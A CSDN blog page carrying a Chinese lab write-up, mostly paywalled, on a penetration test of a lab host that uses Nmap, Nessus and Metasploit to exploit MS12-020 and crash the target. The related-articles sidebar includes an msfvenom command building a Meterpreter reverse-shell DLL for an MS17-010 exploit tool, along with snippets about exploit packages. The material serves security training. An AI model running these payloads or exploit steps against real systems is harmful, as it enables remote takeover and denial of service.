利用MS12-020进行的一次简单渗透测试

最新推荐文章于 2024-04-26 19:13:06 发布
VIP文章 最新推荐文章于 2024-04-26 19:13:06 发布
阅读量2w 收藏 22
点赞数 5
分类专栏: 渗透测试 文章标签: 漏洞 测试 nmap 渗透 MSF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/meyo_leo/article/details/77950552
版权

一、 实验目的

  1. 掌握Nmap扫描器的安装与使用;
  2. 掌握Nmap进行远程OS检测的原理;
  3. 掌握Nessus在本机或远程控制,进行漏洞分析扫描;
  4. 掌握Metasploit对目标漏洞的利用;
  5. 运用Nmap、Nessus、Metasploit进行一次简单的内网渗透;
  6. 该实验为综合性实验。

二、 实验原理及方法

  1. 用Nmap对目标主机进行扫描,从而得到目标主机的主机发现、端口扫描、应用与版本侦测、操作系统侦测的结果;
  2. 用Nessus对目标主机进行漏洞分析扫描;
  3. 用Metasploit对目标漏洞进行利用;
  4. 该试验选用MS12-020,该漏洞利用后可导致目标主机蓝屏重启。

三、 实验内容

  1. 运用Nmap扫描目标主机,根据参数得到目标主机的开放端口、操作系统版本号及主机明细,进一步对目标主机展开分析;
  2. 运用Nessus对目标主机进行漏洞分析扫描;
  3. 运用Metasploit对目标主机所存在的漏洞进行利用。

四、 实验环境和器材

  1. 本机操作系统:Microsoft Windows 10;
  2. 目标主机IP:192.168.1.3;
  3. Nmap版本:7.50;
  4. Nessus版本:6.10.2;
  5. Metasploit版本:4.14.0。

五、 实验步骤

①打开Nmap的图形界面ZeNmap,设置参数及目标主机IP;
这里写图片描述

②点击扫描,得到目标主机的主机明细;

最低0.47元/天 解锁文章
来一罐椰子水
关注
  • 5
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
永恒之蓝ms17_010方程式漏洞利用工具.rar
12-03
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。...
MS12-020漏洞(远程桌面漏洞)(渗透笔记)
weixin_43899811的博客
10-05 863
小白渗透测试笔记,ms12-020漏洞
kail利用msf工具对MS12-020漏洞进行渗透测试
qq_50854662的博客
05-16 733
kail利用msf工具对MS12-020漏洞进行渗透测试 MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞 kail利用msf工具对MS12-020漏洞进行渗透测试: 实验环境: 工具:metasploit 靶机两台:windows 7sp1和kali2020 攻击机IP地址:192.168.29.129 被攻击机IP地址:192.168.29.128 实验条件:两台机子可以互通的,并且windows 7sp1(无补丁)开启了3389端口,防火墙是关闭
MS12_020 漏洞利用与安全加固
theRavensea
03-18 984
MS12_020 漏洞全称为:Microsoft Windows 远程桌面协议远程代码执行漏洞。 远程桌面协议(Remote Desktop Protocol,RDP),是一个多通道(mutil-channel)的协议,让用户(客户端或称“本地电脑”)连上提供微软终端机服务的计算机(服务器端或称“远程计算机”)。Windows 在处理某些对象是存在错误,可通过特制的 RDP 报文访问未初始化的或已经删除的对象,导致任意代码执行,进而控制系统。
ms12-020漏洞
cencen666的博客
11-02 9104
ms12-020漏洞 (全称:Microsoft windows远程桌面协议RDP远程代码执行漏洞) 死亡蓝屏。这是远程桌面协议中两个秘密报告的漏洞。如果攻击者向受影响的系统发送一系列特制 RDP 数据包,则这些漏洞中较严重的漏洞可能允许远程执行代码。默认情况下,任何 Windows 操作系统都未启用远程桌面协议 (RDP)。没有启用 RDP 的系统不受威胁。 概念 RDP协议是一个多通道的协议,让用户连上提供微软终端机服务的电脑。 windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化
漏洞分析:MS12-020漏洞
liu914589417的博客
04-28 6298
漏洞分析:MS12-020漏洞 实验工具 1、VMware虚拟机 2、Kali 2021 系统虚拟机 3、Windows 7系统虚拟机 1、第一步:在VMware中打开Kali 2021虚拟机和Windows 7虚拟机,并确保两台机器能够互相【Ping】通,网络连接正常。 2、确定能连通后,打开MSF攻击框架,Kali 2021【终端】中输入命令【msfconsole】。 3、输入搜索命令,搜索MS12-020漏洞,输入命令【search ms12_020】。 4、引用编号为【1】的漏洞,引用漏洞路径,
ms12-020 死亡蓝屏漏洞复现
lianliandad的博客
11-01 2928
好好学习
如何入门渗透测试
热门推荐
qq_28205153的博客
04-03 4万+
转眼间,从大三开始学安全,到现在也有五年了,也算是对渗透测试有一定理解,公众号准备出一些入门教程,以实操为主,希望可以帮助到想入门渗透测试的小白。如果觉得有用,可以在文章后面支持一下我,作为我写下去的动力。 1. 什么是渗透测试 渗透测试就是模拟真实黑客的攻击手法对目标网站或主机进行全面的安全评估,与黑客攻击不一样的是,渗透测试的目的是尽可能多地发现安全漏洞,而真实黑客攻击只要发现一处入侵点即可以进入目标系统。 一名优秀的渗透测试工程师也可以认为是一个厉害的黑客,也可以被称呼为白帽子。 一定要注意的是,在.
Kn0ck:自动化工具渗透测试
01-31
Kn0ck是一种自动扫描程序,可以在渗透测试期间使用,以枚举并扫描漏洞。 KN0CK社区功能: 自动收集基本侦察 自动针对目标域启动Google黑客查询 通过NMap端口扫描自动枚举打开的端口 自动暴力破解子域,收集DNS...
工控安全职业证书技能实践:内网横向渗透测试与实战.docx
07-13
这是一般用于渗透测试所需要搭建好的的环境,我们所搭建的域控为winsever2008,域成员服务器为2000sever和win7sever,我们利用win2000sever的ms08067漏洞去打win2000sever,获取win2000sever控制权,然后假定kali...
MS12-020漏洞各个版本PoC&EXP打包(含NC,亲测可用)
11-07
MS12-020漏洞各个版本PoC&EXP打包(含NC,亲测可用) [网上流传版]MS12-020 PoC[bug修正版 + 数据包nc发送版] [个人版]ms12-020 Ruby,Python,EXE,DAT,NC一应俱全
ms12-020压缩包
04-03
  本次Windows RDP服务的这个漏洞也使得攻击者控制用户服务器或者造成蓝屏 3月19日消息,Windows服务器近日被爆存在高危远程代码执行漏洞——MS12-020,微软公司把该漏洞级别定为最高级-严重(Critical),攻击者可以通过向远程桌面端口(端口号3389)发送特定的数据包获得管理员权限
工业互联网安全测试技术:应用测试实验文档.docx
06-24
任务一:环境准备以及渗透测试 获取目标主机的ip地址,命令以及结果如下图所示: 图1目标主机ip查询 利用kali当中的nmap检测目标主机的端口开放情况,命令以及相应结果如下图所示: 图2 nmap检测 从检测结果可以看出...
工业互联网安全测试技术:系统测试实验文档.docx
06-24
任务一:环境准备以及渗透测试 获取目标主机的ip地址,命令以及结果如下图所示: 图1目标主机ip查询 利用kali当中的nmap检测目标主机的端口开放情况,命令以及相应结果如下图所示: 图2 nmap检测 从检测结果可以看出...
CODEFORCES --- 1807A. Plus or Minus
weixin_45691078的博客
04-23 317
对于每个测试用例,在新行上输出 + 或 (-),代表正确的等式。≤162 ) - 测试用例数。每个测试用例的描述由三个整数。≤18 ).输入的附加限制条件:生成的输入将使两个等式中的。如果第一个等式为真,则输出 +,否则输出 -。第三个测试用例中, 2−9=−7。在第一个测试案例中, 1+2=3 .在第二个测试用例中, 3−2=1。,使得这两个等式中有。
selenium入门篇(环境搭建、八大定位)
最新发布
u014694915的博客
04-26 413
Web自动化测现状1.属于E2E测试2.过去通过点点点3.好的测试,还需要记录、调试网页的细节。
测试测试详解
qq_74455045的博客
04-22 735
螺旋/瀑布模型、v/w模型、增量/迭代/敏捷、等价类、边界值、黑盒/白盒/灰盒测试、α/β测试、静态/动态测试、手工/自动化测试、国际化/本地化测试测试用例
测试工程师常见面试题及答案
哎 你看的博客
04-25 341
什么是软件测试生命周期(STLC)?、解释黑盒测试和白盒测试的区别、什么是回归测试?、解释缺陷生命周期、详细描述一下你是如何编写测试用例的、STLC的各个阶段具体包含哪些内容?
ms14-068漏洞实验
06-01
ms14-068 漏洞实验是一个模拟漏洞攻击的实验,旨在帮助安全研究人员、渗透测试人员和网络管理员更好地了解和防范该漏洞。该漏洞最初被发现于2014年,影响到了微软的 Windows 域控制器。攻击者可以利用漏洞来提升其在网络中的权限,包括在域控制器上创建、修改和删除帐户。这是一种非常危险的漏洞,因此对其进行实验和研究是非常重要的。 通过进行 ms14-068 漏洞实验,您可以模拟攻击者如何利用漏洞进行攻击,并学习如何防范这种攻击。在实验中,您将使用一些工具和技术,如 Metasploit,来模拟攻击和测试防御措施。在完成实验后,您将能够更好地了解该漏洞的工作原理,如何检测该漏洞以及如何防御该漏洞。 总之,ms14-068 漏洞实验是一种非常有用的方式,可以帮助您提高网络安全意识和技能,保护您的网络免受攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值